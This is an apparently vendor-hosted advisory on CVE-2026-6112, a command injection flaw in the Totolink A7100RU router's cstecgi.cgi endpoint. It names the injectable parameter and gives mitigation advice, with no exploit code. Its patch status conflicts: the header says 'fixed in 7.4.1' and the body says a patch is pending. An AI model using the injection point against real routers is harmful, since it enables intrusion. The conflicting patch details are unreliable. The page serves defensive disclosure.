Platform
linux
Component
totolink-a7100ru
Fixed in
7.4.1
A critical Command Injection vulnerability (CVE-2026-6112) has been discovered in the Totolink A7100RU router. This flaw allows attackers to remotely execute arbitrary operating system commands by manipulating the maxRtrAdvInterval argument within the /cgi-bin/cstecgi.cgi file. The vulnerability affects versions 7.4cu.2313_b20191024 and a public exploit is already available, making it a high-priority concern. Mitigation strategies are available while a patch is being developed.
The impact of CVE-2026-6112 is severe. Successful exploitation allows an attacker to gain complete control over the affected Totolink A7100RU router. This includes the ability to modify router configurations, intercept network traffic, install malware, and potentially pivot to other devices on the network. Given the router's role as a network gateway, a compromise could expose an entire internal network to further attacks. The availability of a public exploit significantly increases the likelihood of widespread exploitation, potentially impacting numerous home and small business networks. This vulnerability shares similarities with other command injection flaws where improper input validation leads to arbitrary code execution.
CVE-2026-6112 is considered a high-probability threat due to the availability of a public proof-of-concept exploit. It has not yet been added to the CISA KEV catalog, but its severity and public availability warrant close monitoring. The vulnerability was publicly disclosed on 2026-04-12. Active exploitation is highly likely given the ease of exploitation and the lack of a readily available patch.
Exploit Status
EPSS
1.25% (79% percentile)
CISA SSVC
CVSS Vector
While a patch is pending, several mitigation steps can be taken to reduce the risk. First, consider isolating the affected router from the internet by placing it behind a firewall or using a VPN. Review and restrict access to the /cgi-bin/cstecgi.cgi file, limiting access to trusted IP addresses only. Implement strict input validation on any parameters passed to this file. Monitor router logs for suspicious activity, particularly attempts to access or modify the maxRtrAdvInterval parameter. Consider temporarily disabling the affected functionality if possible. After implementing these mitigations, verify their effectiveness by attempting to access the vulnerable endpoint with a benign request and confirming that it is properly sanitized.
Update the Totolink A7100RU device firmware to a patched version. Refer to the official Totolink website or contact technical support for the latest firmware version and update instructions.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-6112 is a critical vulnerability allowing remote command execution on Totolink A7100RU routers due to improper input validation in the /cgi-bin/cstecgi.cgi file.
You are affected if you are using a Totolink A7100RU router running version 7.4cu.2313_b20191024 and have not applied a patch or implemented mitigating controls.
A patch is pending. Until then, implement mitigations like isolating the router, restricting access to the vulnerable file, and monitoring logs.
Due to the public availability of a proof-of-concept exploit, active exploitation is highly likely.
Refer to the Totolink website for updates and advisories regarding CVE-2026-6112. Check their security notice section for the latest information.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.